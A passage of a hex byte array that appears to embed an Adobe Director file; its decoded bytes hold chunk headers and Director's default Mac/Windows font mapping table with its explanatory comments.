0x1F, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x05, 0x00, 0x00, 0x00,
0x00, 0x04, 0x01, 0x00, 0x2A, 0x53, 0x41, 0x43, 0x09, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00,
0x66, 0x6E, 0x69, 0x43, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C,
0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00,
0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00,
0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C,
0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x08, 0x00, 0x00, 0x00,
0x00, 0x04, 0x01, 0x00, 0x20, 0x6C, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x43, 0x52, 0x44, 0x64, 0x00, 0x00, 0x00,
0x00, 0x64, 0x07, 0x82, 0x00, 0x6C, 0x00, 0x70, 0x02, 0x4C, 0x02, 0xF0, 0x00, 0x01, 0x00, 0x01,
0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xFF, 0x00, 0x20, 0xFD, 0x00,
0x00, 0x00, 0x00, 0x00, 0x07, 0x82, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x01, 0x50, 0x00, 0x1E, 0x00, 0x02, 0x0C, 0x3C, 0x00, 0x00, 0x00, 0x3C,
0x3F, 0xD7, 0xE6, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x9B,
0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x7A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x64, 0x72, 0x6F, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x14, 0x00, 0x04,
0x00, 0x01, 0x00, 0x01, 0x70, 0x6D, 0x58, 0x46, 0xEE, 0x0E, 0x00, 0x00, 0x3B, 0x20, 0x43, 0x6F,
0x70, 0x79, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x31, 0x39, 0x39, 0x34, 0x2D, 0x32, 0x30, 0x30,
0x38, 0x2C, 0x20, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x20, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x73,
0x20, 0x49, 0x6E, 0x63, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x65, 0x64, 0x2E, 0x20, 0x20,
0x41, 0x6C, 0x6C, 0x20, 0x52, 0x69, 0x67, 0x68, 0x74, 0x73, 0x20, 0x52, 0x65, 0x73, 0x65, 0x72,
0x76, 0x65, 0x64, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x44, 0x65,
0x66, 0x61, 0x75, 0x6C, 0x74, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61, 0x70, 0x70, 0x69,
0x6E, 0x67, 0x20, 0x54, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x44, 0x69, 0x72,
0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20,
0x61, 0x6E, 0x64, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B,
0x20, 0x54, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x70, 0x72, 0x6F, 0x76, 0x69,
0x64, 0x65, 0x73, 0x20, 0x61, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69,
0x6E, 0x67, 0x20, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x44, 0x69, 0x72,
0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77,
0x73, 0x20, 0x0D, 0x3B, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F,
0x73, 0x68, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x49, 0x66, 0x20, 0x61, 0x20, 0x63, 0x6F, 0x70,
0x79, 0x20, 0x6F, 0x66, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x69,
0x73, 0x20, 0x69, 0x6E, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x61, 0x6D, 0x65, 0x20, 0x66, 0x6F,
0x6C, 0x64, 0x65, 0x72, 0x20, 0x6F, 0x72, 0x20, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72,
0x79, 0x20, 0x61, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x0D, 0x3B, 0x20, 0x44, 0x69, 0x72, 0x65,
0x63, 0x74, 0x6F, 0x72, 0x20, 0x61, 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E,
0x2C, 0x20, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20,
0x61, 0x75, 0x74, 0x6F, 0x6D, 0x61, 0x74, 0x69, 0x63, 0x61, 0x6C, 0x6C, 0x79, 0x20, 0x69, 0x6E,
0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20,
0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x61, 0x62, 0x6C, 0x65,
0x20, 0x69, 0x6E, 0x20, 0x65, 0x76, 0x65, 0x72, 0x79, 0x20, 0x6E, 0x65, 0x77, 0x20, 0x6D, 0x6F,
0x76, 0x69, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x2E, 0x0D,
0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x54, 0x6F, 0x20, 0x61, 0x64, 0x64, 0x20, 0x74, 0x68, 0x69, 0x73,
0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x61,
0x62, 0x6C, 0x65, 0x20, 0x74, 0x6F, 0x20, 0x61, 0x6E, 0x20, 0x65, 0x78, 0x69, 0x73, 0x74, 0x69,
0x6E, 0x67, 0x20, 0x6D, 0x6F, 0x76, 0x69, 0x65, 0x2C, 0x20, 0x63, 0x68, 0x6F, 0x6F, 0x73, 0x65,
0x20, 0x0D, 0x3B, 0x20, 0x4D, 0x6F, 0x76, 0x69, 0x65, 0x3A, 0x50, 0x72, 0x6F, 0x70, 0x65, 0x72,
0x74, 0x69, 0x65, 0x73, 0x2E, 0x2E, 0x2E, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x74, 0x68, 0x65,
0x20, 0x4D, 0x6F, 0x64, 0x69, 0x66, 0x79, 0x20, 0x6D, 0x65, 0x6E, 0x75, 0x2E, 0x20, 0x20, 0x54,
0x68, 0x65, 0x6E, 0x20, 0x63, 0x6C, 0x69, 0x63, 0x6B, 0x20, 0x4C, 0x6F, 0x61, 0x64, 0x20, 0x66,
0x72, 0x6F, 0x6D, 0x20, 0x46, 0x69, 0x6C, 0x65, 0x2E, 0x20, 0x20, 0x0D, 0x3B, 0x20, 0x55, 0x73,
0x65, 0x20, 0x74, 0x68, 0x65, 0x20, 0x64, 0x69, 0x61, 0x6C, 0x6F, 0x67, 0x20, 0x62, 0x6F, 0x78,
0x20, 0x74, 0x68, 0x61, 0x74, 0x20, 0x61, 0x70, 0x70, 0x65, 0x61, 0x72, 0x73, 0x20, 0x74, 0x6F,
0x20, 0x6C, 0x6F, 0x63, 0x61, 0x74, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C,
0x65, 0x2E, 0x0D, 0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20, 0x49, 0x6E,
0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x61, 0x20, 0x73, 0x65,
0x6D, 0x69, 0x63, 0x6F, 0x6C, 0x6F, 0x6E, 0x20, 0x61, 0x74, 0x20, 0x74, 0x68, 0x65, 0x20, 0x62,
0x65, 0x67, 0x69, 0x6E, 0x6E, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x66, 0x20, 0x61, 0x20, 0x6C, 0x69,
0x6E, 0x65, 0x20, 0x69, 0x6E, 0x64, 0x69, 0x63, 0x61, 0x74, 0x65, 0x73, 0x0D, 0x3B, 0x20, 0x61,
0x20, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x53, 0x70,
0x65, 0x63, 0x69, 0x61, 0x6C, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x4D,
0x61, 0x63, 0x20, 0x4F, 0x53, 0x58, 0x20, 0x75, 0x73, 0x65, 0x72, 0x73, 0x3A, 0x20, 0x54, 0x68,
0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x69, 0x73, 0x20, 0x73, 0x61, 0x76, 0x65, 0x64,
0x20, 0x75, 0x73, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x68, 0x65, 0x20, 0x27, 0x43, 0x6C, 0x61, 0x73,
0x73, 0x69, 0x63, 0x27, 0x20, 0x6C, 0x69, 0x6E, 0x65, 0x0D, 0x3B, 0x20, 0x65, 0x6E, 0x64, 0x69,
0x6E, 0x67, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x20, 0x28, 0x43, 0x52,
0x29, 0x2E, 0x20, 0x20, 0x49, 0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x6E, 0x65, 0x65, 0x64, 0x20,
0x74, 0x6F, 0x20, 0x61, 0x6C, 0x74, 0x65, 0x72, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x73, 0x61, 0x76,
0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x6D, 0x61, 0x6B,
0x65, 0x20, 0x73, 0x75, 0x72, 0x65, 0x20, 0x74, 0x6F, 0x20, 0x0D, 0x3B, 0x20, 0x70, 0x72, 0x65,
0x73, 0x65, 0x72, 0x76, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x2D, 0x20, 0x74, 0x68, 0x65,
0x20, 0x55, 0x4E, 0x49, 0x58, 0x20, 0x6C, 0x69, 0x6E, 0x65, 0x20, 0x65, 0x6E, 0x64, 0x69, 0x6E,
0x67, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x20, 0x28, 0x4C, 0x46, 0x29,
0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x77, 0x6F, 0x72, 0x6B, 0x20, 0x70,
0x72, 0x6F, 0x70, 0x65, 0x72, 0x6C, 0x79, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x0D, 0x3B, 0x0D,
0x3B, 0x20, 0x46, 0x4F, 0x4E, 0x54, 0x20, 0x4D, 0x41, 0x50, 0x50, 0x49, 0x4E, 0x47, 0x53, 0x20,
0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E,
0x67, 0x73, 0x20, 0x73, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x20, 0x77, 0x68, 0x69, 0x63, 0x68,
0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x20, 0x73,
0x75, 0x62, 0x73, 0x74, 0x69, 0x74, 0x75, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x20, 0x74, 0x6F, 0x20,
0x6D, 0x61, 0x6B, 0x65, 0x20, 0x77, 0x68, 0x65, 0x6E, 0x0D, 0x3B, 0x20, 0x6D, 0x6F, 0x76, 0x69,
0x6E, 0x67, 0x20, 0x61, 0x20, 0x6D, 0x6F, 0x76, 0x69, 0x65, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20,
0x6F, 0x6E, 0x65, 0x20, 0x70, 0x6C, 0x61, 0x74, 0x66, 0x6F, 0x72, 0x6D, 0x20, 0x74, 0x6F, 0x20,
0x61, 0x6E, 0x6F, 0x74, 0x68, 0x65, 0x72, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x54, 0x68, 0x65,
0x20, 0x66, 0x6F, 0x72, 0x6D, 0x61, 0x74, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x66, 0x6F, 0x6E, 0x74,
0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x69, 0x74,
0x69, 0x6F, 0x6E, 0x73, 0x20, 0x69, 0x73, 0x3A, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x50, 0x6C, 0x61,
0x74, 0x66, 0x6F, 0x72, 0x6D, 0x3A, 0x46, 0x6F, 0x6E, 0x74, 0x4E, 0x61, 0x6D, 0x65, 0x20, 0x3D,
0x3E, 0x20, 0x50, 0x6C, 0x61, 0x74, 0x66, 0x6F, 0x72, 0x6D, 0x3A, 0x46, 0x6F, 0x6E, 0x74, 0x4E,
0x61, 0x6D, 0x65, 0x20, 0x5B, 0x4D, 0x41, 0x50, 0x20, 0x4E, 0x4F, 0x4E, 0x45, 0x5D, 0x20, 0x5B,
0x6F, 0x6C, 0x64, 0x53, 0x69, 0x7A, 0x65, 0x20, 0x3D, 0x3E, 0x20, 0x6E, 0x65, 0x77, 0x53, 0x69,
0x7A, 0x65, 0x5D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x53, 0x70, 0x65, 0x63, 0x69,
0x66, 0x79, 0x69, 0x6E, 0x67, 0x20, 0x4D, 0x41, 0x50, 0x20, 0x4E, 0x4F, 0x4E, 0x45, 0x20, 0x74,
0x75, 0x72, 0x6E, 0x73, 0x20, 0x6F, 0x66, 0x66, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74,
0x65, 0x72, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x74,
0x68, 0x69, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x2E, 0x0D, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x49,
0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x73, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x20, 0x73, 0x69,
0x7A, 0x65, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x2C, 0x20, 0x74, 0x68, 0x65,
0x79, 0x20, 0x61, 0x70, 0x70, 0x6C, 0x79, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x54, 0x48, 0x41, 0x54,
0x20, 0x46, 0x4F, 0x4E, 0x54, 0x20, 0x4F, 0x4E, 0x4C, 0x59, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20,
0x48, 0x65, 0x72, 0x65, 0x20, 0x61, 0x72, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x79,
0x70, 0x69, 0x63, 0x61, 0x6C, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x66,
0x6F, 0x72, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x20,
0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x3A,
0x0D, 0x3B, 0x0D, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x68, 0x69, 0x63, 0x61, 0x67, 0x6F, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x73,
0x74, 0x65, 0x6D, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F,
0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x47,
0x65, 0x6E, 0x65, 0x76, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,
0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E, 0x73, 0x20, 0x53, 0x65, 0x72,
0x69, 0x66, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x48, 0x65, 0x6C, 0x76, 0x65, 0x74, 0x69, 0x63,
0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x41, 0x72, 0x69,
0x61, 0x6C, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x4D, 0x6F, 0x6E, 0x61, 0x63, 0x6F, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x54, 0x65, 0x72, 0x6D,
0x69, 0x6E, 0x61, 0x6C, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x4E, 0x65, 0x77, 0x20, 0x59, 0x6F,
0x72, 0x6B, 0x22, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D,
0x53, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x79, 0x6D,
0x62, 0x6F, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69,
0x6E, 0x3A, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x20, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F,
0x6E, 0x65, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D,
0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x31, 0x34,
0x3D, 0x3E, 0x31, 0x32, 0x20, 0x31, 0x38, 0x3D, 0x3E, 0x31, 0x34, 0x20, 0x32, 0x34, 0x3D, 0x3E,
0x31, 0x38, 0x20, 0x33, 0x30, 0x3D, 0x3E, 0x32, 0x34, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x50, 0x61,
0x6C, 0x61, 0x74, 0x69, 0x6E, 0x6F, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57,
0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F,
0x6D, 0x61, 0x6E, 0x22, 0x0D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x48, 0x65, 0x72, 0x65, 0x20, 0x61,
0x72, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x79, 0x70, 0x69, 0x63, 0x61, 0x6C, 0x20,
0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x74, 0x68, 0x65,
0x20, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77,
0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x3A, 0x0D, 0x3B, 0x0D, 0x0D, 0x57, 0x69, 0x6E, 0x3A,
0x41, 0x72, 0x69, 0x61, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x48, 0x65, 0x6C, 0x76, 0x65, 0x74, 0x69,
0x63, 0x61, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x22,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A,
0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F, 0x75,
0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E,
0x20, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x0D, 0x57, 0x69, 0x6E,
0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x4E, 0x65, 0x77, 0x20, 0x59,
0x6F, 0x72, 0x6B, 0x22, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E,
0x73, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61,
0x63, 0x3A, 0x47, 0x65, 0x6E, 0x65, 0x76, 0x61, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x6D,
0x62, 0x6F, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D,
0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x20, 0x20, 0x4D, 0x61,
0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x73, 0x74, 0x65,
0x6D, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,
0x4D, 0x61, 0x63, 0x3A, 0x43, 0x68, 0x69, 0x63, 0x61, 0x67, 0x6F, 0x0D, 0x57, 0x69, 0x6E, 0x3A,
0x54, 0x65, 0x72, 0x6D, 0x69, 0x6E, 0x61, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4D, 0x6F, 0x6E, 0x61, 0x63, 0x6F, 0x0D,
0x57, 0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52,
0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x54, 0x69,
0x6D, 0x65, 0x73, 0x22, 0x20, 0x31, 0x32, 0x3D, 0x3E, 0x31, 0x34, 0x20, 0x31, 0x34, 0x3D, 0x3E,
0x31, 0x38, 0x20, 0x31, 0x38, 0x3D, 0x3E, 0x32, 0x34, 0x20, 0x32, 0x34, 0x3D, 0x3E, 0x33, 0x30,
0x0D, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20, 0x57, 0x68, 0x65, 0x6E, 0x20, 0x6D,
0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x57, 0x69, 0x6E, 0x64,
0x6F, 0x77, 0x73, 0x20, 0x74, 0x6F, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68,
0x2C, 0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x43, 0x6F,
0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70,
0x20, 0x6F, 0x6E, 0x74, 0x6F, 0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x2E, 0x20, 0x20,
0x57, 0x68, 0x65, 0x6E, 0x20, 0x63, 0x6F, 0x6D, 0x69, 0x6E, 0x67, 0x20, 0x62, 0x61, 0x63, 0x6B,
0x20, 0x74, 0x6F, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x6F, 0x6E, 0x6C, 0x79,
0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x0D, 0x3B, 0x20, 0x77,
